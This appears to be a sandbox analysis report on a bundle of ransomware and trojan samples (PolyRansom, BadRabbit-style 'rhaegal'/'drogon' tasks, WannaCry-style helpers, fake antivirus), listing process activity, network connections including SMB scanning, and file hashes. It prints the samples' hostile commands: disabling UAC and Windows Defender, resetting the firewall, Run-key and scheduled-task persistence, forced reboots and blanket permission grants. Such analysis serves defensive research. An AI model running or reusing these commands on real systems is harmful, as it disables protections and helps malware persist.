PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 1488 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\SysWOW64\rundll32.exe
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Delete /F /TN rhaegal

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe

"C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"

C:\ProgramData\IIwkMYAg\wqccYwoU.exe

"C:\ProgramData\IIwkMYAg\wqccYwoU.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00

C:\Windows\9DB7.tmp

"C:\Windows\9DB7.tmp" \\.\pipe\{5D983210-E07A-4516-81E0-21DD0A2D9431}

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QWQgYkUo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 152

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\Fantom.exe

"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Users\Admin\AppData\Local\Temp\ose00000.exe

"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AC18.tmp\302746537.bat" "

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1692 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\[email protected]" & start C:\Users\Admin\AppData\Local\xeozppms.exe -f

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp" /SL4 $20190 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /F /TN rhaegal

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\saMkQEcw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cmd.exe

cmd /c 154151664462343.bat

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe

"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fwUcoUQE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RYwAQMsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\@[email protected]

"C:\Users\Admin\AppData\Local\Temp\@[email protected]"

C:\Program Files (x86)\VAV\vav.exe

"C:\Program Files (x86)\VAV\vav.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /pid 1692

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\sc.exe

sc stop WinDefend

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\sc.exe

sc config WinDefend start= disabled

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Roaming\lflesb.exe

C:\Users\Admin\AppData\Roaming\lflesb.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

"C:\Users\Admin\AppData\Local\Temp\taskdl.exe"

C:\Users\Admin\AppData\Local\Temp\ose00000.exe

"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"

C:\Users\Admin\AppData\Local\Temp\Fantom.exe

"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 152

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\taskse.exe

"C:\Users\Admin\AppData\Local\Temp\taskse.exe"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe

"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\muYwoMUs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "aztxuihvriyhjfk319" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]

C:\Users\Admin\AppData\Local\Temp\@[email protected]

@[email protected] vs

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\icYMcwcs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\is-BQ48U.tmp\is-GS133.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BQ48U.tmp\is-GS133.tmp" /SL4 $300D0 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 140.82.114.3:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:80 google.com tcp
NL 142.250.179.142:80 google.com tcp
BO 200.87.164.69:9999 tcp
N/A 10.127.0.1:445 tcp
DE 193.23.244.244:443 tcp
US 128.31.0.39:9101 tcp
N/A 10.127.0.1:139 tcp
DE 176.9.40.131:443 tcp
DE 103.158.223.168:9001 tcp
FI 65.21.85.98:9001 tcp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 google.ru udp
RU 77.88.55.50:80 yandex.ru tcp
NL 142.251.36.35:80 google.ru tcp
RU 77.88.55.50:443 yandex.ru tcp
N/A 10.127.0.3:139 tcp
BO 200.119.204.12:9999 tcp
US 140.82.114.3:443 github.com tcp
N/A 10.127.0.4:139 tcp
BO 200.119.204.12:9999 tcp
DE 185.53.177.53:80 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
BO 190.186.45.170:9999 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
BO 190.186.45.170:9999 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
US 8.8.8.8:53 searchaccount.org udp
US 8.8.8.8:53 ashamedice.com udp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
DE 78.159.97.210:80 tcp
FR 46.105.131.122:80 tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 www5.internet-security-guard.com udp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
US 173.194.37.104:80 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
US 8.8.8.8:53 www.vikingwebscanner.com udp
N/A 10.127.0.21:445 tcp

Files

memory/564-54-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

memory/564-55-0x00000000004B0000-0x00000000004C6000-memory.dmp

memory/564-56-0x0000000000530000-0x0000000000536000-memory.dmp

memory/564-57-0x00000000005A0000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/1344-58-0x0000000000000000-mapping.dmp

memory/1116-61-0x0000000000000000-mapping.dmp

memory/1344-60-0x0000000074AD1000-0x0000000074AD3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

